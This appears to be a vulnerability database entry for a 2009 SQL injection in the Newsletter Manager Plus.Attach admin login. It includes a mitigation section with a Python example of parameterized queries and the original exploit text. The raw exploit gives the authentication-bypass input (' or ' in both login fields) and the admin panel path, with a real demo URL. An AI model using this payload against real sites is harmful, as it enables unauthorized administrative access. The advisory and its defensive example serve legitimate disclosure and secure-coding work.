Vendor: Newsletter Manager Plus.Attach
By: ByALBAYX
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Newsletter Manager Plus.Attach
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Newsletter Manager Plus.Attach

Newsletter Manager Plus.Attach contains an SQL injection vulnerability that lets an attacker bypass authentication and gain access to the administrative panel. By sending a specially crafted HTTP request, an attacker can inject arbitrary SQL code into the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
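
As an added example (not code from the product or from the original report), the sketch below contrasts a login query built by string concatenation with a validated, parameterized one. It uses Python's sqlite3 as a stand-in for the application's ASP data layer; the admins table, its columns, the sample credentials and the username allowlist are all assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data; table and column names are assumptions.
    Plaintext password only to keep the example short; store a hash in practice."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret-Example')")
    return db

def unsafe_sql(username, password):
    """The 'before' pattern: input spliced into the statement text.
    Returned as a string for inspection only; it is never executed here."""
    return ("SELECT COUNT(*) FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")

# Assumed allowlist policy for usernames (validation step of the mitigation).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")

def bound_lookup(db, username, password):
    """Parameter binding: the values travel separately from the SQL text,
    so quotes inside them are compared as data, not parsed as syntax."""
    return db.execute(
        "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()[0]

def safe_login(db, username, password):
    """Validate the username first, then query with bound parameters."""
    if not USERNAME_RE.fullmatch(username):
        return False
    return bound_lookup(db, username, password) == 1

if __name__ == "__main__":
    db = make_db()
    field = "' or '"  # the field value quoted in the report
    # Concatenation: the quotes close the literal and change the WHERE clause.
    print(unsafe_sql(field, field))
    # Validation plus binding: rejected, while the real credentials still work.
    print(safe_login(db, field, field))
    print(safe_login(db, "admin", "s3cret-Example"))
```

With concatenation the submitted quotes end the string literal and the rest of the field is parsed as SQL; with bound parameters the same text is only ever compared as a value.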
Source

Exploit-DB raw data:

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG

@~~=From     : Turkish
@~~=======================================~~@
@~~=Script   :Newsletter Manager Plus.Attach

@~~=S.Site   :http://designerfreesolutions.com

@~~=Dty      :http://designerfreesolutions.com/web/viewitem.asp?idproduct=1025

@~~=Demo     :http://designerfreesolutions.com/newsletterattach

@~~=Price    :47.00 USD
@~~=======================================~~@

@~~=Exploit:


@~~=Username: ' or '

@~~=Password: ' or '


@~~=http://c4team.org /Newsletter Manager /admin/index.asp


@~~=Demo:

@~~=http://www.designerfreesolutions.com/newsletterattach/admin/index.asp

etc.
@~~=======================================~~@
@~~=Greetz For
  
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
I listened to my own troubles and was disgusted by them...
I saw his troubles and came to envy my own...
Palestine
@~~=======================================~~@

# milw0rm.com [2009-02-26]